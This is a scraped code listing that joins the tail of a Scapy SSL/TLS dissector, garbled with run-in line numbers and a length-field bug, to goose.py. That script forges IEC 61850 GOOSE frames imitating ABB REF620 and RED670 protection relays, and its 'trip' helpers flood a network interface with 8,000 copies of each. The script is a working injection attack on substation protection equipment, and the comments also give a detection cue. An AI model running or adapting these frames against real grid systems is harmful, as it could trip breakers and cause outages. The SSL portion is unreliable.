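# Reverse map: cipher kind -> attribute name.
SSL2_CIPHER_SUITES = dict((v, k) for k, v in SSLv2CipherSuite.__dict__.items() if not k.startswith("__"))


class SSLv2Record(Packet):
    """SSLv2 record header: 2-byte length with the top bit set, then message type."""
    name = "SSLv2 Record"
    fields_desc = [
        # On build 0x8000 is added (top bit of the first byte set) plus 1 for
        # the content_type byte; on dissect only 0x8000 is subtracted.
        XBLenField("length", None, fmt="!H", adjust_i2m=lambda pkt, x: x + 0x8000 + 1, adjust_m2i=lambda pkt, x:x - 0x8000),
        ByteEnumField("content_type", 0xff, SSLv2_MESSAGE_TYPES),
    ]


class SSLv2ClientHello(Packet):
    name = "SSLv2 Client Hello"
    fields_desc = [
        XShortEnumField("version", 0x0002, TLS_VERSIONS),
        XFieldLenField("cipher_suites_length", None, length_of="cipher_suites",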
fmt="H"),579 XFieldLenField("session_id_length", None, length_of="session_id", fmt="H"),580 XFieldLenField("challenge_length", None, length_of="challenge", fmt="H"),581 582 FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),583 StrLenField("session_id", '', length_from=lambda x:x.session_id_length),584 StrLenField("challenge", '', length_from=lambda x:x.challenge_length),585 ]586 587 588SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}589class SSLv2ServerHello(Packet):590 name = "SSLv2 Server Hello"591 fields_desc = [592 ByteEnumField("session_id_hit", 0x00, TLS_TYPE_BOOLEAN),593 ByteEnumField("certificate_type", 0x01, SSLv2_CERTIFICATE_TYPES),594 XShortEnumField("version", 0x0002, TLS_VERSIONS),595 XFieldLenField("certificate_length", None, length_of="certificates", fmt="H"),596 XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),597 XFieldLenField("connection_id_length", None, length_of="connection_id", fmt="H"),598 599 StrLenField("certificates", '', length_from=lambda x:x.certificate_length),600 FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),601 StrLenField("connection_id", '', length_from=lambda x:x.connection_id_length),602 ]603class SSLv2ClientMasterKey(Packet):604 name = "SSLv2 Client Master Key"605 fields_desc = [606 XBEnumField("cipher_suite", 0x0002, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), # fixme: 3byte wide607 XFieldLenField("clear_key_length", None, length_of="clear_key", fmt="H"),608 XFieldLenField("encrypted_key_length", None, length_of="encrypted_key", fmt="H"),609 XFieldLenField("key_argument_length", None, length_of="key_argument", fmt="H"),610 611 StrLenField("clear_key", '', length_from=lambda x:x.clear_key_length),612 StrLenField("encrypted_key", '', length_from=lambda x:x.clear_key_length),613 
StrLenField("key_argument", '', length_from=lambda x:x.key_argument_length),614 ]615 616# entry class617class SSL(Packet):618 '''619 COMPOUND CLASS for SSL620 '''621 name = "SSL/TLS"622 fields_desc = [PacketListField("records", None, TLSRecord)]623 624 def pre_dissect(self, s):625 # figure out if we're UDP or TCP626 627 if self.underlayer and self.underlayer.haslayer(UDP):628 self.guessed_next_layer = DTLSRecord629 elif ord(s[0]) & 0x80:630 # SSLv2 Header631 self.guessed_next_layer = SSLv2Record632 else:633 self.guessed_next_layer = TLSRecord634 self.fields_desc = [PacketListField("records", None, self.guessed_next_layer)]635 return s636 def do_dissect(self, s):637 pos = 0638 cls = self.guessed_next_layer # FIXME: detect DTLS639 cls_len = len(cls())640 try:641 while pos <= len(s):642 # consume payloads and add them to records list643 record = cls(s[pos:], _internal=1) # FIXME: performance644 layer_len = cls_len + record.length645 if layer_len == None:646 break647 record = cls(s[pos:pos + layer_len])648 pos += layer_len649 # print pos,len(s)650 self.records.append(record)651 except Exception, e:652 pass653 # raise e654 return s[pos:]655 def encrypt(self, master_secret):656 pass657 658 def encrypt_stream(self):659 '''660 HMAC_hash(MAC_write_secret, seq_num + TLSCompressed.type +661 TLSCompressed.version + TLSCompressed.length +662 TLSCompressed.fragment));663 '''664 pass665 666 def decrypt(self, master_secret): pass667 668 def compress(self): pass669 def decompress(self): pass670 671# bind magic672bind_layers(TCP, SSL, dport=443)673bind_layers(TCP, SSL, sport=443)674bind_layers(UDP, SSL, dport=4433)675bind_layers(UDP, SSL, sport=4433)676# TLSRecord677bind_layers(TLSRecord, TLSChangeCipherSpec, {'content_type':0x14})678bind_layers(TLSRecord, TLSHeartBeat, {'content_type':0x18})679bind_layers(TLSRecord, TLSAlert, {'content_type':0x15})680bind_layers(TLSRecord, TLSHandshake, {'content_type':0x16})681# --> handshake proto682bind_layers(TLSHandshake, TLSClientHello, 
{'type':0x01})683bind_layers(TLSHandshake, TLSServerHello, {'type':0x02})684bind_layers(TLSHandshake, TLSCertificateList, {'type':0x0b})685bind_layers(TLSHandshake, TLSClientKeyExchange, {'type':0x10})686bind_layers(TLSHandshake, TLSServerKeyExchange, {'type':0x0c})687bind_layers(TLSHandshake, TLSFinished, {'type':0x20})688# <---689bind_layers(TLSServerKeyExchange, TLSKexParamEncryptedPremasterSecret)690bind_layers(TLSClientKeyExchange, TLSKexParamEncryptedPremasterSecret)691bind_layers(TLSServerKeyExchange, TLSKexParamDH)692bind_layers(TLSClientKeyExchange, TLSKexParamDH)693# --> extensions694bind_layers(TLSExtension, TLSServerNameIndication, {'type': 0x0000})695bind_layers(TLSExtension, TLSExtMaxFragmentLength, {'type': 0x0001})696bind_layers(TLSExtension, TLSExtCertificateURL, {'type': 0x0002})697bind_layers(TLSExtension, TLSExtECPointsFormat, {'type': 0x000b})698bind_layers(TLSExtension, TLSExtEllipticCurves, {'type': 0x000a})699# bind_layers(TLSExtension,Raw,{'type': 0x0023})700bind_layers(TLSExtension, TLSExtHeartbeat, {'type': 0x000f})701# <--702# DTLSRecord703bind_layers(DTLSRecord, DTLSHandshake, {'content_type':0x16})704bind_layers(DTLSHandshake, DTLSClientHello, {'type':0x01})705# SSLv2 706bind_layers(SSLv2Record, SSLv2ServerHello, {'content_type':0x04})707bind_layers(SSLv2Record, SSLv2ClientHello, {'content_type':0x01})...
goose.py
Source:goose.py
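from scapy.all import *
from scapy.layers.ntp import TimeStampField
import datetime
from binascii import unhexlify

# IEC 61850 GOOSE frame builder for Scapy.
#
# The frames built below carry no authentication field; IEC 62351-6 is the
# standard that adds message authentication to GOOSE. Every frame sent by the
# *_trip() helpers is the same object, so stNum and sqNum never change across
# the burst. A GOOSE-aware monitor can key on that: a live publisher increments
# sqNum on each retransmission, so a long run of identical sqNum values for one
# gocbRef stands out.

# Interface name handed to sendp() by the *_trip() helpers.
INTERFACE = "Intel(R) Ethernet Connection (4) I219-V"
# Number of iterations each *_trip() helper runs.
PACKET_QTY = 8000

# Data-set payload appended after the PDU by both packet builders.
_GOOSE_DATA_HEX = "ab088301018403030000"


def num2str(num):
    """Return *num* as a minimal-length big-endian ``bytearray``.

    The earlier implementation skipped every zero byte above the lowest one,
    so a value such as 0x010000 came out as two bytes (``01 00``) instead of
    three, and anything above 40 bits was silently truncated. Interior zero
    bytes are now kept and the width follows the value.

    Args:
        num: non-negative integer to encode.

    Returns:
        bytearray holding the big-endian bytes; ``0`` encodes as one zero byte.

    Raises:
        ValueError: if *num* is negative.
    """
    if num < 0:
        raise ValueError("num2str expects a non-negative integer")
    width = max(1, (num.bit_length() + 7) // 8)
    return bytearray(num.to_bytes(width, "big"))


class GooseHeader(Packet):
    """Fixed eight-byte header placed between the Ethernet layer and the PDU."""

    name = "Goose Header"
    fields_desc = [ShortField("appid", 1),
                   ShortField("length", 0),
                   ShortField("reserved1", None),
                   ShortField("reserved2", None)]


class GoosePDU(Packet):
    """GOOSE PDU laid out as a flat run of tag / length / value fields.

    Each attribute appears as ``<name>_t`` (tag byte), ``<name>_l`` (length
    byte) and ``<name>`` (value). ``sequence_el`` is only present when
    ``sequence_l`` exceeds 127.
    """

    name = "Goose PDU"
    fields_desc = [ByteField("sequence_t", 0x61),
                   ConditionalField(ByteField("sequence_el", 0x81), lambda pkt: pkt.sequence_l > 127),
                   ByteField("sequence_l", 0),
                   ByteField("gocbRef_t", 0x80),
                   FieldLenField("gocbRef_l", None, length_of="gocbRef", fmt="B"),
                   StrLenField("gocbRef", None, length_from=lambda pkt: pkt.gocbRef_l),
                   ByteField("timeAllowedtoLive_t", 0x81),
                   FieldLenField("timeAllowedtoLive_l", None, length_of="timeAllowedtoLive", fmt="B"),
                   StrLenField("timeAllowedtoLive", None, length_from=lambda pkt: pkt.timeAllowedtoLive_l),
                   ByteField("datSet_t", 0x82),
                   FieldLenField("datSet_l", None, length_of="datSet", fmt="B"),
                   StrLenField("datSet", None, length_from=lambda pkt: pkt.datSet_l),
                   ByteField("goID_t", 0x83),
                   FieldLenField("goID_l", None, length_of="goID", fmt="B"),
                   StrLenField("goID", None, length_from=lambda pkt: pkt.goID_l),
                   ByteField("T_t", 0x84),
                   ByteField("T_l", 8),
                   TimeStampField("T", None),
                   ByteField("stNum_t", 0x85),
                   FieldLenField("stNum_l", None, length_of="stNum", fmt="B"),
                   StrLenField("stNum", None, length_from=lambda pkt: pkt.stNum_l),
                   ByteField("sqNum_t", 0x86),
                   FieldLenField("sqNum_l", None, length_of="sqNum", fmt="B"),
                   StrLenField("sqNum", None, length_from=lambda pkt: pkt.sqNum_l),
                   ByteField("simulation_t", 0x87),
                   ByteField("simulation_l", 1),
                   ByteField("simulation", None),
                   ByteField("confRev_t", 0x88),
                   FieldLenField("confRev_l", None, length_of="confRev", fmt="B"),
                   StrLenField("confRev", None, length_from=lambda pkt: pkt.confRev_l),
                   ByteField("ndsCom_t", 0x89),
                   ByteField("ndsCom_l", 1),
                   ByteField("ndsCom", None),
                   ByteField("numDatSetEntries_t", 0x8a),
                   FieldLenField("numDatSetEntries_l", None, length_of="numDatSetEntries", fmt="B"),
                   StrLenField("numDatSetEntries", None, length_from=lambda pkt: pkt.numDatSetEntries_l)
                   ]


def _assemble_frame(ethernet_mac, goose_pdu, appid):
    """Fill in the length fields and stack Ethernet / header / PDU / data."""
    goose_data = unhexlify(_GOOSE_DATA_HEX)
    # sequence_l is measured while sequence_el is still absent (sequence_l == 0);
    # the header length below is taken after the assignment, so it includes
    # the extra byte whenever sequence_l ends up above 127.
    goose_pdu.sequence_l = (len(goose_pdu) + len(goose_data) - 2)
    goose_header = GooseHeader(appid=appid, length=len(goose_pdu) + len(goose_data) + 8)
    return ethernet_mac / goose_header / goose_pdu / goose_data


def ref620_packet():
    """Build one frame using the hard-coded REF620 identifiers (appid 12289)."""
    ethernet_mac = Ether(src='00:21:c1:50:52:95', dst='01:0c:cd:01:00:01', type=0x88b8)
    goose_pdu = GoosePDU(gocbRef="ABBREF620LD0/LLN0$GO$Control_DataSet",
                         timeAllowedtoLive=num2str(2200),
                         datSet="ABBREF620LD0/LLN0$Dataset_GOOSE",
                         goID="ABBREF620/LD0/LLN0/Control_DataSet",
                         T=datetime.datetime.now(datetime.timezone.utc).timestamp(),
                         stNum=num2str(444),
                         sqNum=num2str(0),
                         simulation=0,
                         confRev=num2str(20400),
                         ndsCom=0,
                         numDatSetEntries=num2str(2)
                         )
    return _assemble_frame(ethernet_mac, goose_pdu, 12289)


def red670_packet():
    """Build one frame using the hard-coded RED670 identifiers (appid 12290)."""
    ethernet_mac = Ether(src='00:00:23:2d:24:05', dst='01:0c:cd:01:00:00', type=0x88b8)
    goose_pdu = GoosePDU(gocbRef="ABBRED670LD0/LLN0$GO$gcbGOOSE",
                         timeAllowedtoLive=num2str(11000),
                         datSet="ABBRED670LD0/LLN0$GOOSE",
                         goID="ABBRED670LD0/LLN0.gcbGOOSE",
                         T=datetime.datetime.now(datetime.timezone.utc).timestamp(),
                         stNum=num2str(1),
                         sqNum=num2str(0),
                         simulation=0,
                         confRev=num2str(100),
                         ndsCom=0,
                         numDatSetEntries=num2str(2)
                         )
    return _assemble_frame(ethernet_mac, goose_pdu, 12290)


def _send_repeated(*frames):
    """Send each frame in *frames*, in order, PACKET_QTY times on INTERFACE."""
    for _ in range(PACKET_QTY):
        for frame in frames:
            sendp(frame, iface=INTERFACE)
    return "DONE"


def ref620_trip():
    """Send the ref620_packet() frame PACKET_QTY times; returns "DONE"."""
    return _send_repeated(ref620_packet())


def red670_trip():
    """Send the red670_packet() frame PACKET_QTY times; returns "DONE"."""
    return _send_repeated(red670_packet())


def all_trip():
    """Alternate the two frames, PACKET_QTY iterations each; returns "DONE"."""
    return _send_repeated(ref620_packet(), red670_packet())


if __name__ == '__main__':
    print("GOOSE packet for Scapy by Sever Sudakov")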